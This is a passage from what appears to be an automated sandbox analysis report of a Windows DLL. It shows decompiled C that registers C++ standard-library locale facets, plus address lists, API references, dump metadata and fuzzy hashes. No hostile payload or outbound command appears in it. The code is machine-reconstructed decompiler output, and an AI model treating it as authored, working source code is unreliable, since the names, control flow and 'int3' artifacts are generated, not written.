																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6D486FD3(__eflags, _t561);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6d546de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6D486FD3(__eflags, _t560);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6d546ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6D486FD3(__eflags, _t559);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6d546db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6D486FD3(__eflags, _t558);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6d546dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6D486FD3(__eflags, _t557);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6d546dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6D486FD3(__eflags, _t556);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6d546dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6D486FD3(__eflags, _t555);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6d546df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6D486FD3(__eflags, _t554);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6d546df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6D486FD3(__eflags, _t553);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6d546dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

0x6d48f4c1
0x6d48f4c1
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f2
0x6d48f4f7
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff

APIs

__EH_prolog3.LIBCMT ref: 6D48F4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F4D2
int.LIBCPMT ref: 6D48F4E9

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F523
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F543
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F561

Strings

tmTm, xrefs: 6D48F4DD

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tmTm
API String ID: 651022567-1757558033
Opcode ID: 59ee74bd1e7249873aa93737dbbafe173653949efd75f463c9d3809c29833a68
Instruction ID: 4a0ba9735bf9c19bdaf6bec11731a8877e4a019d69ce30148f1c8976754e2b4f
Opcode Fuzzy Hash: 59ee74bd1e7249873aa93737dbbafe173653949efd75f463c9d3809c29833a68
Instruction Fuzzy Hash: 1D11A0758082699BCF05EBA4C840FEDB775AF94314F2A410CD611AB392DB75EE0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t682 - 0x14, 0);
				_t651 =  *0x6d546dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6D46161C(0x6d546d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6D4866BA(_t682 - 0x14);
					return E6D4A0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6D490FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t682 - 0x20);
							E6D4A3D74(_t682 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t635, _t651, 0x14);
							E6D486653(_t682 - 0x14, 0);
							_t652 =  *0x6d546df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6D46161C(0x6d546d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6D4866BA(_t682 - 0x14);
								return E6D4A0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6D491057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t682 - 0x20);
										E6D4A3D74(_t682 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t482, _t636, _t652, 0x14);
										E6D486653(_t682 - 0x14, 0);
										_t653 =  *0x6d546dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6D46161C(0x6d546d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6D4866BA(_t682 - 0x14);
											return E6D4A0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6D4910BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t682 - 0x20);
													E6D4A3D74(_t682 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t482, _t637, _t653, 0x14);
													E6D486653(_t682 - 0x14, 0);
													_t654 =  *0x6d546df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6D46161C(0x6d546da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6D4866BA(_t682 - 0x14);
														return E6D4A0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6D491127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t682 - 0x20);
																E6D4A3D74(_t682 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t482, _t638, _t654, 0x14);
																E6D486653(_t682 - 0x14, 0);
																_t655 =  *0x6d546df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6D46161C(0x6d546da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6D4866BA(_t682 - 0x14);
																	return E6D4A0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6D4911AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t682 - 0x20);
																			E6D4A3D74(_t682 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t482, _t639, _t655, 0x14);
																			E6D486653(_t682 - 0x14, 0);
																			_t656 =  *0x6d546dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6D46161C(0x6d546d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6D4866BA(_t682 - 0x14);
																				return E6D4A0075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6D491230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t682 - 0x20);
																						E6D4A3D74(_t682 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t482, _t640, _t656, 0x14);
																						E6D486653(_t682 - 0x14, 0);
																						_t657 =  *0x6d546dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6D46161C(0x6d546d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6D4866BA(_t682 - 0x14);
																							return E6D4A0075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6D4912B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t682 - 0x20);
																									E6D4A3D74(_t682 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t482, _t641, _t657, 0x14);
																									E6D486653(_t682 - 0x14, 0);
																									_t658 =  *0x6d546dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6D46161C(0x6d546d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6D4866BA(_t682 - 0x14);
																										return E6D4A0075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6D491339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t682 - 0x20);
																												E6D4A3D74(_t682 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t482, _t642, _t658, 0x14);
																												E6D486653(_t682 - 0x14, 0);
																												_t659 =  *0x6d546db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6D46161C(0x6d546d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6D4866BA(_t682 - 0x14);
																													return E6D4A0075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6D4913A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t682 - 0x20);
																															E6D4A3D74(_t682 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t482, _t643, _t659, 0x14);
																															E6D486653(_t682 - 0x14, 0);
																															_t660 =  *0x6d546ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6D46161C(0x6d546d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6D4866BA(_t682 - 0x14);
																																return E6D4A0075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6D491409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t682 - 0x20);
																																		E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t482, _t644, _t660, 0x14);
																																		E6D486653(_t682 - 0x14, 0);
																																		_t661 =  *0x6d546de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6D46161C(0x6d546d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6D4866BA(_t682 - 0x14);
																																			return E6D4A0075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6D491471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t682 - 0x20);
																																					E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t482, _t645, _t661, 0x14);
																																					E6D486653(_t682 - 0x14, 0);
																																					_t662 =  *0x6d546dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6D46161C(0x6d546da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6D4866BA(_t682 - 0x14);
																																						return E6D4A0075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6D4914EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t682 - 0x20);
																																								E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t482, _t646, _t662, 0x14);
																																								E6D486653(_t682 - 0x14, 0);
																																								_t663 =  *0x6d546dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6D46161C(0x6d546d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6D4866BA(_t682 - 0x14);
																																									return E6D4A0075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6D491558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t682 - 0x20);
																																											E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t482, _t647, _t663, 0x14);
																																											E6D486653(_t682 - 0x14, 0);
																																											_t664 =  *0x6d546e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6D46161C(0x6d546dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6D4866BA(_t682 - 0x14);
																																												return E6D4A0075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6D4915C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t682 - 0x20);
																																														E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t482, _t648, _t664, 0x14);
																																														E6D486653(_t682 - 0x14, 0);
																																														_t665 =  *0x6d546dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6D46161C(0x6d546d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6D4866BA(_t682 - 0x14);
																																															return E6D4A0075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
